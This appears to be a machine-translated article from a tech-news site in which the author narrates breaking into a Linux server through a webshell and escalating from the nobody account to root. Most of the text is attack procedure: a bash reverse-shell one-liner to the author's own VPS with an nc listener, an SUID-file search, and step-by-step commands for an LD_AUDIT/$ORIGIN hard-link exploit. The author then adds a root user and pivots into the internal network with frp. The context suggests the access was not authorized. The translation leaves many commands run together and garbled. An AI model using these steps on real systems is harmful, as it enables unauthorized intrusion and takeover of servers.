Shulou(Shulou.com)05/31 Report--

What this article shares to you is about how to raise the rights of Linux. The editor thinks it is very practical, so I share it with you to learn. I hope you can get something after reading this article.

Preface of 0X01

Recently, a little brother asked me if I had an idle server, but there were several windows, but my little brother was a Linux system administrator who was not familiar with windows. I went through my webshell and found one or two Linux, but the permissions were very low. I wanted to bring it down anyway (after eating a meal), so I had this article, and GET went to a new position of raising power.

0X02 text

Shell how to get unknown, weak password background getshell. Use the command whoami to view the current permissions. Found to be nobody permission. Nobody is an account that cannot be logged in in linux, and some service processes, such as apache,aquid, use special accounts to run, such as nobody,news,games, etc., which can prevent hackers from getting root permission when the program itself has security problems.

When it comes to the promotion of Linux rights, the first thing that comes to mind must be the use of kernel vulnerabilities to find the corresponding version of exp to directly overflow rights.

First use the command uname-a to view the current operating system version. Found to be 2.6.18-194.17.1.el5

I'm getting older, thinking that I won't bring it up for you every minute. Linux raises the right to get an interactive shell first. There are several ways to do this, and I'm using the bash method here. First listen to a port on your vps and use the command nc-lvp port, then execute bash-i > & / dev/tcp/ip/port0 > & 1 on webshell to get the bounced shell.

Find exp that can be used by the current system, upload, give permissions, gcc compilation, execution, one-stop operation. However, this process may encounter all kinds of problems. The victim host may not have the gcc,gcc compiler prompt for the lack of a library, but it can still not elevate the permissions. Anyway, I used up all kinds of exp, but I still couldn't bring it up.

Change the way of thinking, found that the victim host is using MySQL, so a random search finally found the MySQL password, want to use MySQLudf to lift rights, but before the Linux udf rights has not been tried, and online articles on this aspect are rarely the same, so give up.

MySQL password is actually quite simple, I think database passwords are so simple, will not ssh is also a weak password, try to connect, can not connect directly, so give up.

The passwdshadow file also does not have permission to read. What shall I do?? A variety of searches, found that there is another trick SUID lift method. There are also few articles about this on the Internet. SUID is a permission mechanism of Linux, and a file with this permission will give the caller temporary access to the owner of the file when it is executed. If you have SUID permissions, you can use the binaries and tools in the system to elevate root rights. First, to find the files on the system that use SUID, use the command find/-perm-UBSs-type f 2 > / dev/null

You can see that so many files have SUID identifiers. Here we use ping.

The steps are as follows (from blog https://blog.csdn.net/fffygapl/article/details/51783346)

Change to the tmp directory

Cd/tmp

Create an exploit directory

Mkdirexploit

View ping commands with suid permission

Ll/bin/ping

Create a hard link to an target file

Ln/bin/ping / tmp/exploit/target

View target file permissions

Ll/tmp/exploit/target

Load the target file into memory

Exec3 < / tmp/exploit/target

Check how target is in memory

"ll/proc/$$/fd/3"

Delete target Fil

Rm-rf / tmp/exploit/

Check the deletion status of target in memory.

"ll/proc/$$/fd/3"

Create a c language code

Vimpayload.c

In fact, because it is a rebounded bash, it is not recommended to use vim directly under bash. You can write it locally and upload it to the tmp directory. And if the ll command is not available, you can use ls-l instead.

Compile this code with gcc

Gcc-W-fPIC-shared-o / tmp/exploit payload.c

Elevate to root permission

LD_AUDIT= "\ $ORIGIN" exec / proc/self/fd/3

After execution, check that the current session is already root

OK is already authorized by root.

The next operation will not go into detail, create a new user to modify passwd to add to the root user group and then use frp to penetrate the internal network, there is also a pit, it is very inconvenient to edit the passwd file with vi under bash, you can change it locally and then replace the passwd. Attach a ssh successful connection diagram.

The above is how to promote the rights of Linux. The editor believes that there are some knowledge points that we may see or use in our daily work. I hope you can learn more from this article. For more details, please follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.